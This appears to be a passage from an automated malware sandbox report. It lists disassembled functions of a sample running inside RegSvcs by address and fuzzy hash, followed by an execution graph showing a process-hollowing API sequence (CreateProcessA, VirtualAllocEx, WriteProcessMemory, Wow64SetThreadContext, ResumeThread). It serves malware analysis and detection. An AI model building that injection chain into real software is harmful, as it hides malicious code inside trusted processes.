                                                                        • Instruction Fuzzy Hash: A18173B5B00216DFCB05DF68C4849AEBBF1FF89650B1544AAE915EB3A1D730ED41CBA0
                                                                        Function 071ADDE0 Relevance: .2, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e959adae26c1f383b84ff535036ed64ec7f50c10b8f281c72d8fbe75fd863ca6
                                                                        • Instruction ID: 8cc4306788b6582b8698061d521b5dee9d49e6dd93a79211543801af94e26580
                                                                        • Opcode Fuzzy Hash: e959adae26c1f383b84ff535036ed64ec7f50c10b8f281c72d8fbe75fd863ca6
                                                                        • Instruction Fuzzy Hash: 5F518F75B002059FCB04DFB9E48099ABBF5FF88210B1581AAD545E7766DB30EC41CB90
                                                                        Function 071ACBA0 Relevance: .1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3780fe7df2bd4feaacb454f9b3b6f9ecd15ce42091dc3d7d6b6b2b79d008a524
                                                                        • Instruction ID: 7dd90c49fdd068bb7212c75b670b8121f6cdca8b3229021cbeb8cf31d400f549
                                                                        • Opcode Fuzzy Hash: 3780fe7df2bd4feaacb454f9b3b6f9ecd15ce42091dc3d7d6b6b2b79d008a524
                                                                        • Instruction Fuzzy Hash: 17414FB8B10205DFCB05DF69C54496EBBF1FF89650B1580AAE805DB3A6DB30ED41CBA0
                                                                        Function 071ACF5B Relevance: .1, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a5bb918c51cf1d0ccc8fe4da3b99565c031c2ad6ef25fba29a91c7cb4df74f87
                                                                        • Instruction ID: 9a19745a86aa1107ac78c00b2c180f80d4a33ecb28fd2f9cad962b36b6f5c609
                                                                        • Opcode Fuzzy Hash: a5bb918c51cf1d0ccc8fe4da3b99565c031c2ad6ef25fba29a91c7cb4df74f87
                                                                        • Instruction Fuzzy Hash: C0418F747003159FCB56DF34D884AAE7BB2FF89600B508069E906CB396DB35ED45CBA1
                                                                        Function 071ACF68 Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be5c0c1e29e04c6fa173a542bf2be8e5d8ac14757934337d937c7cc4d9bcccc0
                                                                        • Instruction ID: 36059c42b1b2041877840094549ff88668b7732acf4007af0cd3a926e0469b26
                                                                        • Opcode Fuzzy Hash: be5c0c1e29e04c6fa173a542bf2be8e5d8ac14757934337d937c7cc4d9bcccc0
                                                                        • Instruction Fuzzy Hash: 03317E79700215AFCB55DF38D884AAE7BB2FF89700B508068E906CB395DB35ED45CBA0
                                                                        Function 071AE0A1 Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 576e170d0cf43ef41e3dad831216ebba2281f7a96b5c2e40f4075fda28ed2b4e
                                                                        • Instruction ID: ea305229f6a736c9f9b468d6083e544a5ca5612d0128aa6ed8926056edba5a71
                                                                        • Opcode Fuzzy Hash: 576e170d0cf43ef41e3dad831216ebba2281f7a96b5c2e40f4075fda28ed2b4e
                                                                        • Instruction Fuzzy Hash: 8A31AD747093569FC706DF78C85096A7BF6AF8A60071540EAE445CB3A3DB34DC1ACBA2
                                                                        Function 071ACAD0 Relevance: .1, Instructions: 82COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5b2939c2132873a949c361d71c5eac23ac4253fcab9ef67337c3e3357bf0c4e7
                                                                        • Instruction ID: 987556f8a60a716e721935640c1a83224e9ce84f2bd0f87bd6948904454c49e8
                                                                        • Opcode Fuzzy Hash: 5b2939c2132873a949c361d71c5eac23ac4253fcab9ef67337c3e3357bf0c4e7
                                                                        • Instruction Fuzzy Hash: 5731B6B9A003169FCB12DFA8D8809EEBBB1FF85660B100459E415EB391D732AD41CBE1
                                                                        Function 0145D054 Relevance: .1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597346484.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_145d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c69d30ceac3551d1dd8898a428eb34283c22542cd10d93512128a75e63662aa0
                                                                        • Instruction ID: dcc463c1065669d4f4455b73ada446068aea9dd1dda32b90ffda00014d039248
                                                                        • Opcode Fuzzy Hash: c69d30ceac3551d1dd8898a428eb34283c22542cd10d93512128a75e63662aa0
                                                                        • Instruction Fuzzy Hash: 7D21E5B2900244EFDB559F94D8C0B17BBA5FF88718F24C16AED090A267C336D456CB62
                                                                        Function 0146D2C4 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597499699.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_146d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 78ccc8c0fc2c4a256450ad7380beeb91deaf2c5d4a5fce65931392c1a633bd6d
                                                                        • Instruction ID: a2c667ea06da673c960fbb606ded1ed0f3c5fb199593fb9ba9e9ba4aa6d61537
                                                                        • Opcode Fuzzy Hash: 78ccc8c0fc2c4a256450ad7380beeb91deaf2c5d4a5fce65931392c1a633bd6d
                                                                        • Instruction Fuzzy Hash: CA21F971A04244DFDB11DF94D980B26BB69FB84728F24C56AD8894B356C336D486CAA3
                                                                        Function 0146D474 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597499699.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_146d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 71af21b10e01fecd58a2bf054e9c0cdf3c947d235edcfca708e6c28114566cd3
                                                                        • Instruction ID: 31eef687dc1c6ec1a490776758d3ca2bc95f307d3151fc7cc866292d9386a392
                                                                        • Opcode Fuzzy Hash: 71af21b10e01fecd58a2bf054e9c0cdf3c947d235edcfca708e6c28114566cd3
                                                                        • Instruction Fuzzy Hash: 0521D671A04204EFDB05DF94D5C0B26BB69FB8831CF24C56AD8894B766C336D846CA63
                                                                        Function 071AE0F8 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 555adcb1ec5b4a3fc537d49ecb6564ee48021714e0969f5d6a2ef4f8c970a368
                                                                        • Instruction ID: bb1e5bfe4b289f523c7f5fec36be52525126d48a09e539c70a12d2fb7010a4b6
                                                                        • Opcode Fuzzy Hash: 555adcb1ec5b4a3fc537d49ecb6564ee48021714e0969f5d6a2ef4f8c970a368
                                                                        • Instruction Fuzzy Hash: C22159B5B00119DF8B15EF68D89086EB7F6FF8865071040A9E905DB361DB31DC02CBE1
                                                                        Function 071AE0E8 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 87f87725780e2e20edacf627d5b525a71e1565a2f3daedf35c127cd7725263af
                                                                        • Instruction ID: e8a4551d98cc9eefa5090e38df5018c7d718970530a3cba5ad815fb6bd9787bb
                                                                        • Opcode Fuzzy Hash: 87f87725780e2e20edacf627d5b525a71e1565a2f3daedf35c127cd7725263af
                                                                        • Instruction Fuzzy Hash: 16117CB4B002169FCB15DF78D89486EBBF6EF8964071540AAD805DB3A2DB31DC068BD1
                                                                        Function 071ADF88 Relevance: .1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cdbc613dad853a2dd37a217ca3529f5a31256c83f58edf52d0ac85cb27727f1
                                                                        • Instruction ID: 5b4661be14dd4e705332fa88ea48ff76933f64f5c19b6c5a3ee0adcc0c0472d2
                                                                        • Opcode Fuzzy Hash: 8cdbc613dad853a2dd37a217ca3529f5a31256c83f58edf52d0ac85cb27727f1
                                                                        • Instruction Fuzzy Hash: DA1160B5B011059BCB259B65D9186AFBBF5EB88720F051079E406F3394DF715C49CB90
                                                                        Function 0145D04F Relevance: .1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597346484.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_145d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 36dba3e712238e0a66f9469a116caccf835c09763754274a0d957b5f10e5b951
                                                                        • Instruction ID: b4d75a8c1bedc5e538fd4a9fbd13897867c7331cbbdb3237e4725e118df4f553
                                                                        • Opcode Fuzzy Hash: 36dba3e712238e0a66f9469a116caccf835c09763754274a0d957b5f10e5b951
                                                                        • Instruction Fuzzy Hash: 8521CD72804280DFCB06CF54D9C0B16BF72FF88314F2482AADD480A267C33AD466CB92
                                                                        Function 0146D46F Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597499699.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_146d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: 6d7c7ce944e2f1d21438a24a964c6a0049cbfb09047ce11780b2640189b9bca8
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: FE118E75A04240DFDB16CF54D5C4B16BF61FB88318F24C6AAD8494B766C33AD44ACB52
                                                                        Function 0146D2BF Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597499699.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_146d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                                        • Instruction ID: a26e1e0d08df6d508d6a14e233644c4541d7ed44873b06ce3ddf5958d7ed5f1b
                                                                        • Opcode Fuzzy Hash: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                                        • Instruction Fuzzy Hash: 3311B275A04680DFDB12CF14D5C4B1AFF61FB84328F24C6AAD8894B756C33AD446CBA2
                                                                        Function 071AFC00 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd385af75ca3841ddea7e869cdea958e7f700e55c2f4c6a44b73da0b3322aa10
                                                                        • Instruction ID: e3c254a42aa88b221e974b1df45292f77ab9be7b8425b684e063fc54fe315349
                                                                        • Opcode Fuzzy Hash: bd385af75ca3841ddea7e869cdea958e7f700e55c2f4c6a44b73da0b3322aa10
                                                                        • Instruction Fuzzy Hash: 4701B575B002199FCB10DEAAAC44ABFFBFEFBC8251700843AE505D3240DB35991587A1
                                                                        Function 071AE851 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7dd9254e9bd66ef36b6e0dc0d70046558a5e2820830f3921e85e694167479abb
                                                                        • Instruction ID: 479c2145e973c881d38e7b448036e28742e2841a112a16b7da060ce1a085c361
                                                                        • Opcode Fuzzy Hash: 7dd9254e9bd66ef36b6e0dc0d70046558a5e2820830f3921e85e694167479abb
                                                                        • Instruction Fuzzy Hash: CC01A7762092D53FCB128E765C108FA7FEDDE4E5617084097F994D7142C129C925DBB0
                                                                        Function 0145DA95 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597346484.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_145d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 27bf684f419c1e1299a6545192a900186db04f74a9a1c2d1238e5a942e12f6d3
                                                                        • Instruction ID: 54a5a0e230a8c747bf0eb00cbd8542547f7843f912a0cc3a01ab9c497c376c84
                                                                        • Opcode Fuzzy Hash: 27bf684f419c1e1299a6545192a900186db04f74a9a1c2d1238e5a942e12f6d3
                                                                        • Instruction Fuzzy Hash: F401A771808344ABE7509FA9D884B67BFD8EF41620F18C45BED091A6A7C3759841CA72
                                                                        Function 071ACEDB Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e7e151e44970eed402bf92b30211f419ae95a23bf0cf95fc27e35983f007152d
                                                                        • Instruction ID: d2d5d7dbac74602a292f89c9c8f1389e70f92e8103ab0f7fd2f58a199099cea5
                                                                        • Opcode Fuzzy Hash: e7e151e44970eed402bf92b30211f419ae95a23bf0cf95fc27e35983f007152d
                                                                        • Instruction Fuzzy Hash: 1801F274200303EFCB568F75D8106A3BBF6BFC6604B18886AE44287682E735E845CBE1
                                                                        Function 071AE870 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 716e5eccda42f39cdce28f8b364dd402e044ba63198c48c2259fdb8ec5029ff9
                                                                        • Instruction ID: 4b5b54128461002e39adf2f3b70ddad3a15c7b04ec3aded0fdaf658238997102
                                                                        • Opcode Fuzzy Hash: 716e5eccda42f39cdce28f8b364dd402e044ba63198c48c2259fdb8ec5029ff9
                                                                        • Instruction Fuzzy Hash: FE01A4762082D53FCB524EAA5C108FB7FECDE4E6617084067FA94D6142C139C911DB70
                                                                        Function 071ACEE8 Relevance: .0, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e832ef3162a2176c6592e9fd105a9f7af47de8d2751d34f4a0a2914194a1f9c
                                                                        • Instruction ID: 5256527d759346fbf333da48225257f15cb6216e9c6c295ba86e2b1d9c76ef71
                                                                        • Opcode Fuzzy Hash: 8e832ef3162a2176c6592e9fd105a9f7af47de8d2751d34f4a0a2914194a1f9c
                                                                        • Instruction Fuzzy Hash: 8B01F4B8610703EFCB6A8E79E514623B3E7BFC5205B14883CD40287684EB71E581CBE0
                                                                        Function 071AE1A8 Relevance: .0, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 43ab7191c5de8e4e54cd66648a7d2795834173b1ec8d1bb0fbbf83f714eff3ba
                                                                        • Instruction ID: 2b9122b7f22472176392bfa8562a3e31751ecaef6a48617ab8984efee145b5a3
                                                                        • Opcode Fuzzy Hash: 43ab7191c5de8e4e54cd66648a7d2795834173b1ec8d1bb0fbbf83f714eff3ba
                                                                        • Instruction Fuzzy Hash: 57F0C231654342AFC3228A79E805F957FE9EF82B24F04827BE154CB1D2D3B5A84AC751
                                                                        Function 0145DA94 Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1597346484.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_145d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 19f8d7c0ea40bcea1d067c40706da798f23b33a8d7aff670c51d1987a27a7887
                                                                        • Instruction ID: 9f52310055a9ce8ca25d0125f383476d2566cc0b75e638df95ce6189a435967b
                                                                        • Opcode Fuzzy Hash: 19f8d7c0ea40bcea1d067c40706da798f23b33a8d7aff670c51d1987a27a7887
                                                                        • Instruction Fuzzy Hash: E9F06D75409384AEE7148E1AD8C4B67FFD8EF41734F18C49AED085B297C2799844CAB1
                                                                        Function 071AE880 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eac8c16f76e17f2489c21acef587868cfda2bfec35095f766296fc64c6579cbd
                                                                        • Instruction ID: e66d40385cb98c043455b8a8c70b0211766f149ff2192730fc2e92c01a631569
                                                                        • Opcode Fuzzy Hash: eac8c16f76e17f2489c21acef587868cfda2bfec35095f766296fc64c6579cbd
                                                                        • Instruction Fuzzy Hash: 8FF012A22041E83F8B529E9A5C10CFF7FEDDA8E5617084056FEA8D2241C429C920ABB0
                                                                        Function 071AD078 Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aeeb204d7542c73bad37b13eb9168837e42173866b7cbc082f8140e145efa981
                                                                        • Instruction ID: e751a549d9e0ad69ccb0a21ce8ac9e0b98ac009263ebc0bfc9a2b5201dca195e
                                                                        • Opcode Fuzzy Hash: aeeb204d7542c73bad37b13eb9168837e42173866b7cbc082f8140e145efa981
                                                                        • Instruction Fuzzy Hash: C0E0657210C3419FC381DA34A850993BBE4EF92210B15C86EE584C7581D731D481C791

                                                                        Execution Graph

                                                                        Execution Coverage:11%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:345
                                                                        Total number of Limit Nodes:24
                                                                        execution_graph 46520 6f27ff2 46522 6f2800a 46520->46522 46521 6f28396 46522->46521 46525 6f29e30 46522->46525 46541 6f29e2a 46522->46541 46526 6f29e4a 46525->46526 46557 6f2a750 46526->46557 46565 6f2ab6d 46526->46565 46570 6f2a44d 46526->46570 46575 6f2a30b 46526->46575 46580 6f2aac5 46526->46580 46589 6f2a907 46526->46589 46597 6f2a786 46526->46597 46602 6f2a67d 46526->46602 46607 6f2a3fb 46526->46607 46615 6f2a355 46526->46615 46620 6f2a575 46526->46620 46625 6f2a8b6 46526->46625 46629 6f2a2b1 46526->46629 46527 6f29e52 46527->46522 46542 6f29e30 46541->46542 46544 6f2a750 4 API calls 46542->46544 46545 6f2a2b1 2 API calls 46542->46545 46546 6f2a8b6 2 API calls 46542->46546 46547 6f2a575 2 API calls 46542->46547 46548 6f2a355 2 API calls 46542->46548 46549 6f2a3fb 4 API calls 46542->46549 46550 6f2a67d 2 API calls 46542->46550 46551 6f2a786 2 API calls 46542->46551 46552 6f2a907 4 API calls 46542->46552 46553 6f2aac5 4 API calls 46542->46553 46554 6f2a30b 2 API calls 46542->46554 46555 6f2a44d 2 API calls 46542->46555 46556 6f2ab6d 2 API calls 46542->46556 46543 6f29e52 46543->46522 46544->46543 46545->46543 46546->46543 46547->46543 46548->46543 46549->46543 46550->46543 46551->46543 46552->46543 46553->46543 46554->46543 46555->46543 46556->46543 46558 6f2a76a 46557->46558 46641 6f272c0 46558->46641 46645 6f272bf 46558->46645 46559 6f2a317 46560 6f2a3bc 46559->46560 46633 6f27370 46559->46633 46637 6f2736a 46559->46637 46560->46527 46566 6f2ab75 46565->46566 46567 6f2ab98 46566->46567 46649 6f27a30 46566->46649 46653 6f27a2f 46566->46653 46571 6f2a455 46570->46571 46573 6f27370 Wow64SetThreadContext 46571->46573 46574 6f2736a Wow64SetThreadContext 46571->46574 46572 6f2a3bc 46572->46527 46573->46572 46574->46572 46576 6f2a317 46575->46576 46577 6f2a3bc 46576->46577 46578 6f27370 Wow64SetThreadContext 46576->46578 46579 6f2736a Wow64SetThreadContext 46576->46579 46577->46527 46578->46577 46579->46577 46581 6f2aada 46580->46581 46582 6f2a74f 46580->46582 46587 6f272c0 ResumeThread 46582->46587 46588 6f272bf ResumeThread 46582->46588 46583 6f2a317 46584 6f2a3bc 46583->46584 46585 6f27370 Wow64SetThreadContext 46583->46585 46586 6f2736a Wow64SetThreadContext 46583->46586 46584->46527 46585->46584 46586->46584 46587->46583 46588->46583 46590 6f2a92b 46589->46590 46595 6f272c0 ResumeThread 46590->46595 46596 6f272bf ResumeThread 46590->46596 46591 6f2a317 46592 6f2a3bc 46591->46592 46593 6f27370 Wow64SetThreadContext 46591->46593 46594 6f2736a Wow64SetThreadContext 46591->46594 46592->46527 46593->46592 46594->46592 46595->46591 46596->46591 46598 6f2a78c 46597->46598 46657 6f27940 46598->46657 46661 6f2793a 46598->46661 46599 6f2a7be 46603 6f2a686 46602->46603 46605 6f27940 WriteProcessMemory 46603->46605 46606 6f2793a WriteProcessMemory 46603->46606 46604 6f2abdb 46605->46604 46606->46604 46666 6f27880 46607->46666 46670 6f27878 46607->46670 46608 6f2a419 46609 6f2ab24 46608->46609 46611 6f27940 WriteProcessMemory 46608->46611 46612 6f2793a WriteProcessMemory 46608->46612 46609->46527 46610 6f2a7be 46611->46610 46612->46610 46616 6f2ab76 46615->46616 46618 6f27a30 ReadProcessMemory 46616->46618 46619 6f27a2f ReadProcessMemory 46616->46619 46617 6f2ab98 46618->46617 46619->46617 46621 6f2a598 46620->46621 46623 6f27940 WriteProcessMemory 46621->46623 46624 6f2793a WriteProcessMemory 46621->46624 46622 6f2aa5d 46623->46622 46624->46622 46627 6f27370 Wow64SetThreadContext 46625->46627 46628 6f2736a Wow64SetThreadContext 46625->46628 46626 6f2a8a2 46627->46626 46628->46626 46675 6f27bc7 46629->46675 46679 6f27bc8 46629->46679 46634 6f273b5 Wow64SetThreadContext 46633->46634 46636 6f273fd 46634->46636 46636->46560 46638 6f27370 Wow64SetThreadContext 46637->46638 46640 6f273fd 46638->46640 46640->46560 46642 6f27300 ResumeThread 46641->46642 46644 6f27331 46642->46644 46644->46559 46646 6f272c0 ResumeThread 46645->46646 46648 6f27331 46646->46648 46648->46559 46650 6f27a7b ReadProcessMemory 46649->46650 46652 6f27abf 46650->46652 46652->46567 46654 6f27a30 ReadProcessMemory 46653->46654 46656 6f27abf 46654->46656 46656->46567 46658 6f27988 WriteProcessMemory 46657->46658 46660 6f279df 46658->46660 46660->46599 46662 6f27909 46661->46662 46663 6f2793f WriteProcessMemory 46661->46663 46662->46599 46665 6f279df 46663->46665 46665->46599 46667 6f278c0 VirtualAllocEx 46666->46667 46669 6f278fd 46667->46669 46669->46608 46671 6f2787f VirtualAllocEx 46670->46671 46672 6f27849 46670->46672 46674 6f278fd 46671->46674 46672->46608 46674->46608 46676 6f27bc8 46675->46676 46676->46676 46677 6f27db6 CreateProcessA 46676->46677 46678 6f27e13 46677->46678 46678->46678 46680 6f27c51 46679->46680 46680->46680 46681 6f27db6 CreateProcessA 46680->46681 46682 6f27e13 46681->46682 46682->46682 46683 4ba38b8 46686 4ba33e4 46683->46686 46685 4ba38ce 46687 4ba33ef 46686->46687 46688 4ba3988 46687->46688 46694 4ba39a8 46687->46694 46699 4bab300 46687->46699 46703 4bab2f0 46687->46703 46707 4ba3999 46687->46707 46688->46685 46689 4ba3952 46689->46685 46695 4ba39d7 46694->46695 46698 4ba3b70 46695->46698 46712 